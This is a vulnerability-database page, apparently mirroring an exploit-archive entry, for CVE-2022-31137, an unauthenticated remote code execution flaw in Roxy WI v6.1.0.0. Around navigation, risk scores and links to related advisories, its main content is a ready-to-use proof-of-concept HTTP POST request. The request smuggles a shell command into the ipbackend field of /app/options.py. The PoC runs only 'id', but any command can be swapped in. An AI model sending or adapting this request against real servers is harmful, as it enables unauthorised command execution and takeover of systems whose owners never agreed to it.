Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtIyaad Luqman K1337DAY-ID-38730
HistoryMay 26, 2023 - 12:00 a.m.

Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution Vulnerability

2023-05-2600:00:00
Iyaad Luqman K
0day.today
239

9.6 High

AI Score

Confidence

High

0.949 High

EPSS

Percentile

99.3%

JSON
# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute
# Exploit Author: Iyaad Luqman K
# Application: Roxy WI <= v6.1.0.0
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31137


# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1

Related

attackerkb 1
osv 1
cvelist 1
prion 1
packetstorm 5
rapid7blog 1
nvd 1
cve 1
exploitdb 4
zdt 4
nuclei 1
thn 1
mssecure 1
mmpc 1
attackerkb
attackerkb
CVE-2022-31137
2022-07-08 00:00:00
osv
osv
CVE-2022-31137
2022-07-08 20:15:07
cvelist
cvelist
CVE-2022-31137 Unauthenticated Remote Code Execution in Roxy-WI
2022-07-08 00:00:00
prion
prion
Remote code execution
2022-07-08 20:15:00
packetstorm
packetstorm
Roxy WI 6.1.0.0 Remote Command Execution
2023-05-24 00:00:00
Roxy WI 6.1.1.0 Remote Code Execution
2023-04-03 00:00:00
Roxy-WI Remote Command Execution
2022-07-26 00:00:00
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up
2022-07-29 20:32:42
nvd
nvd
CVE-2022-31137
2022-07-08 20:15:07
cve
cve
CVE-2022-31137
2022-07-08 20:15:07
exploitdb
exploitdb
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute
2023-05-24 00:00:00
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
2023-04-03 00:00:00
Roxy WI v6.1.0.0 - Improper Authentication Control
2023-04-03 00:00:00
zdt
zdt
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution Vulnerability
2023-04-03 00:00:00
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution via ssl_cert Upload Vulnerability
2023-04-03 00:00:00
Roxy-WI Remote Command Execution Exploit
2022-07-26 00:00:00
nuclei
nuclei
Roxy-WI <6.1.1.0 - Remote Code Execution
2022-08-12 16:51:23
thn
thn
Zerobot Botnet Emerges as a Growing Threat with New Exploits and Capabilities
2022-12-22 09:39:00
mssecure
mssecure
Microsoft research uncovers new Zerobot capabilities
2022-12-21 20:00:00
mmpc
mmpc
Microsoft research uncovers new Zerobot capabilities
2022-12-21 20:00:00

9.6 High

AI Score

Confidence

High

0.949 High

EPSS

Percentile

99.3%

JSON
Related for 1337DAY-ID-38730
attackerkb1osv1cvelist1prion1packetstorm5rapid7blog1nvd1cve1exploitdb4zdt4nuclei1thn1mssecure1mmpc1